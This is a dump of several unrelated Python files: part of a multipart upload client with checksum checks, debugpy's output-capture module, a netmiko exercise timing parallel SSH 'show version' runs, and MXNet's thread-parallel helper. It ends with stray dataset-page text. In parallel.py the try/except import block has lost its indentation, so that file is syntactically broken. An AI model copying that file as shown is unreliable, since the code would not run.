        # check problem status, so we only upload parts missing or invalid
        problem_status = \
            self._failsafe_get_multipart_upload_status(session, problem_id)

        if problem_status.get('status') == 'UPLOAD_COMPLETED':
            logger.debug("Problem already uploaded.")
            return problem_id

        uploaded_parts = \
            self._uploaded_parts_from_problem_status(problem_status)

        # enqueue all parts, worker skips if checksum matches
        parts = {}
        for chunk_no, chunk_generator in enumerate(chunks.generators()):
            # parts are 1-indexed on the server
            part_no = chunk_no + 1
            part_future = self._upload_part_executor.submit(
                self._upload_part_worker,
                problem_id, part_no, chunk_generator,
                uploaded_part_checksum=uploaded_parts.get(part_no))

            parts[part_no] = part_future

        # wait for parts to upload/fail
        concurrent.futures.wait(parts.values())

        # verify all parts uploaded without error
        for part_no, part_future in parts.items():
            try:
                part_future.result()
            except Exception as e:
                errmsg = ("Multipart upload of problem_id={!r} failed for "
                          "part_no={!r} with {!r}.".format(problem_id, part_no, e))
                logger.error(errmsg)
                raise ProblemUploadError(errmsg) from e

        # verify all parts uploaded via status call
        # (check remote checksum matches the local one)
        final_problem_status = \
            self._failsafe_get_multipart_upload_status(session, problem_id)

        final_uploaded_parts = \
            self._uploaded_parts_from_problem_status(final_problem_status)

        if len(final_uploaded_parts) != len(parts):
            errmsg = "Multipart upload unexpectedly failed for some parts."
            logger.error(errmsg)
            logger.debug("problem_id=%r, expected_parts=%r, uploaded_parts=%r",
                         problem_id, parts.keys(), final_uploaded_parts.keys())
            raise ProblemUploadError(errmsg)

        for part_no, part_future in parts.items():
            _, part_checksum = part_future.result()
            remote_checksum = final_uploaded_parts[part_no]
            if part_checksum != remote_checksum:
                errmsg = ("Checksum mismatch for part_no={!r} "
                          "(local {!r} != remote {!r})".format(
                              part_no, part_checksum, remote_checksum))
                logger.error(errmsg)
                raise ProblemUploadError(errmsg)

        # send parts combine request
        combine_checksum = Client._combined_checksum(final_uploaded_parts)
        try:
            self._combine_uploaded_parts(session, problem_id, combine_checksum)
        except Exception as e:
            errmsg = ("Multipart upload of problem_id={!r} failed on parts "
                      "combine with {!r}".format(problem_id, e))
            logger.error(errmsg)
            raise ProblemUploadError(errmsg) from e

        return problem_id
|
output.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import codecs
import os
import sys
import threading
from debugpy import launcher
from debugpy.common import log
class CaptureOutput(object):
    """Captures output from the specified file descriptor, and tees it into another
    file descriptor while generating DAP "output" events for it.
    """

    instances = {}
    """Keys are output categories, values are CaptureOutput instances."""

    def __init__(self, whose, category, fd, stream):
        # only one capturer per category ("stdout"/"stderr"/...) may exist
        assert category not in self.instances
        self.instances[category] = self
        log.info("Capturing {0} of {1}.", category, whose)

        self.category = category
        self._whose = whose
        self._fd = fd
        # surrogateescape lets arbitrary (possibly non-UTF-8) bytes round-trip
        # through the str domain without raising
        self._decoder = codecs.getincrementaldecoder("utf-8")(errors="surrogateescape")

        if stream is None:
            # Can happen if running under pythonw.exe.
            self._stream = None
        else:
            # on Python 3, write raw bytes to the underlying binary buffer
            self._stream = stream if sys.version_info < (3,) else stream.buffer
            self._encode = codecs.getencoder(
                "utf-8" if stream.encoding is None else stream.encoding
            )

        # daemon-ness is not set here; thread is joined via
        # wait_for_remaining_output()
        self._worker_thread = threading.Thread(target=self._worker, name=category)
        self._worker_thread.start()

    def __del__(self):
        # best-effort close of the captured fd; ignore errors on teardown
        fd = self._fd
        if fd is not None:
            try:
                os.close(fd)
            except Exception:
                pass

    def _worker(self):
        # read until EOF, read error, or the fd is closed by _process_chunk
        while self._fd is not None:
            try:
                s = os.read(self._fd, 0x1000)
            except Exception:
                break
            if not len(s):
                break
            self._process_chunk(s)

        # Flush any remaining data in the incremental decoder.
        self._process_chunk(b"", final=True)

    def _process_chunk(self, s, final=False):
        s = self._decoder.decode(s, final=final)
        if len(s) == 0:
            return

        try:
            launcher.channel.send_event(
                "output", {"category": self.category, "output": s.replace("\r\n", "\n")}
            )
        except Exception:
            pass  # channel to adapter is already closed

        if self._stream is None:
            return

        # re-encode for the tee'd stream, preserving undecodable bytes
        s, _ = self._encode(s, "surrogateescape")
        size = len(s)
        i = 0
        while i < size:
            # On Python 2, all writes are full writes, and write() returns None.
            # On Python 3, writes can be partial, and write() returns the count.
            written = self._stream.write(s[i:])
            self._stream.flush()
            if written is None:  # full write
                break
            elif written == 0:
                # This means that the output stream was closed from the other end.
                # Do the same to the debuggee, so that it knows as well.
                os.close(self._fd)
                self._fd = None
                break
            i += written
def wait_for_remaining_output():
    """Blocks until every registered CaptureOutput worker thread has exited.

    Each worker ends once its captured fd hits EOF or errors out, so joining
    all of them guarantees that no further "output" events will be produced.
    """
    for category in CaptureOutput.instances:
        capture = CaptureOutput.instances[category]
        log.info("Waiting for remaining {0} of {1}.", category, capture._whose)
        capture._worker_thread.join()
|
exercise7.py | #!/usr/bin/env python
from net_system.models import NetworkDevice, Credentials
from netmiko import ConnectHandler
from datetime import datetime
from multiprocessing import Process, current_process
import django
def show_ver(device):
    """SSH to *device*, execute 'show version', and close the session.

    The command output is captured but intentionally not printed.
    """
    credentials = device.credentials
    connection = ConnectHandler(
        device_type=device.device_type,
        ip=device.ip_address,
        username=credentials.username,
        password=credentials.password,
        port=device.port)
    outp = connection.send_command("show version")
    # print outp
    connection.disconnect()
def main():
    """Run show_ver() against every NetworkDevice concurrently.

    Spawns one OS process per device so the SSH sessions overlap, waits for
    all of them to finish, then reports the total elapsed wall-clock time.
    """
    django.setup()
    start_time = datetime.now()
    devices = NetworkDevice.objects.all()
    procs = []
    for device in devices:
        # One process per device; results are discarded, only timing matters.
        my_proc = Process(target=show_ver, args=(device,))
        my_proc.start()
        procs.append(my_proc)
    # Block until every child has finished before measuring elapsed time.
    for a_proc in procs:
        a_proc.join()
    # Fixed: was a Python-2 `print` statement, which is a SyntaxError on
    # Python 3; the function-call form behaves identically on both.
    print("Elapsed time {}".format(datetime.now() - start_time))

if __name__ == "__main__":
    main()
|
parallel.py | # coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Utility functions for parallel processing."""
import threading
try:
import Queue as queue
except ImportError:
import queue
__all__ = ['Parallelizable', 'Parallel']
class Parallelizable(object):
    """Abstract unit of work that `Parallel` dispatches to worker threads.

    Subclasses must override `forward_backward`, which receives one input
    item and returns its result. Intended usage with Gluon::

        class ParallelNet(Parallelizable):
            def __init__(self):
                self._net = Model()
                self._loss = gluon.loss.SoftmaxCrossEntropyLoss()
            def forward_backward(self, x):
                data, label = x
                with mx.autograd.record():
                    out = self._net(data)
                    loss = self._loss(out, label)
                loss.backward()
                return loss

        net = ParallelNet()
        ctx = [mx.gpu(0), mx.gpu(1)]
        parallel = Parallel(len(ctx), net)
        # Gluon block is initialized after forwarding the first batch
        initialized = False
        for batch in batches:
            for x in gluon.utils.split_and_load(batch, ctx):
                parallel.put(x)
            losses = [parallel.get() for _ in ctx]
            trainer.step()
    """
    def forward_backward(self, x):
        """Perform the forward and backward computation for one input.

        Must be implemented by subclasses.
        """
        raise NotImplementedError()
class Parallel(object):
    """Drives a `Parallelizable` with multiple Python threads.

    Inputs submitted via `put` are handed to worker threads, each of which
    calls `parallizable.forward_backward` and deposits the result on an
    output queue drained by `get`. Example::

        class ParallelNet(Parallelizable):
            def __init__(self):
                self._net = Model()
                self._loss = gluon.loss.SoftmaxCrossEntropyLoss()
            def forward_backward(self, x):
                data, label = x
                with mx.autograd.record():
                    out = self._net(data)
                    loss = self._loss(out, label)
                loss.backward()
                return loss

        net = ParallelNet()
        ctx = [mx.gpu(0), mx.gpu(1)]
        parallel = Parallel(len(ctx), net)
        for batch in batches:
            for x in gluon.utils.split_and_load(batch, ctx):
                parallel.put(x)
            losses = [parallel.get() for _ in ctx]
            trainer.step()

    Parameters
    ----------
    num_workers : int
        Number of worker threads.
    parallizable :
        Parallelizable net whose `forward` and `backward` methods are invoked
        by multiple worker threads.
    serial_init : bool, default True
        Execute the first `num_workers` inputs in main thread, so that the `Block`
        used in `parallizable` is initialized serially. Initializing a `Block`
        from multiple threads may cause unexpected behavior.
    """
    class _StopSignal(object):
        """Sentinel enqueued to tell a worker thread to exit."""
        def __init__(self, msg):
            self._msg = msg

    def __init__(self, num_workers, parallizable, serial_init=True):
        # Unbounded queues: producers never block on capacity.
        self._in_queue = queue.Queue(-1)
        self._out_queue = queue.Queue(-1)
        self._num_workers = num_workers
        assert self._num_workers > 0, 'num_workers must be positive'
        self._threads = []
        self._parallizable = parallizable
        # Count of leading inputs to run on the caller's thread (see `put`).
        self._num_serial = num_workers if serial_init else 0

        def _run(src, dst, work_unit):
            # Consume inputs until the stop sentinel arrives.
            while True:
                item = src.get()
                if isinstance(item, Parallel._StopSignal):
                    return
                dst.put(work_unit.forward_backward(item))

        worker_args = (self._in_queue, self._out_queue, self._parallizable)
        for _ in range(num_workers):
            worker = threading.Thread(target=_run, args=worker_args)
            self._threads.append(worker)
            worker.start()

    def put(self, x):
        """Hand input `x` to a worker, which invokes
        `parallizable.forward_backward(x)`.

        The first `num_workers` inputs run synchronously on the calling
        thread when `serial_init` was True.
        """
        if self._num_serial <= 0:
            self._in_queue.put(x)
        else:
            self._num_serial -= 1
            self._out_queue.put(self._parallizable.forward_backward(x))

    def get(self):
        """Return one result of a previous `forward_backward` call.

        Blocks until at least one result is available.
        """
        return self._out_queue.get()

    def __del__(self):
        # Signal each still-running worker to stop, then join with a bound
        # so interpreter shutdown cannot hang indefinitely.
        for worker in self._threads:
            if worker.is_alive():
                self._in_queue.put(self._StopSignal('stop'))
        for worker in self._threads:
            worker.join(10)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.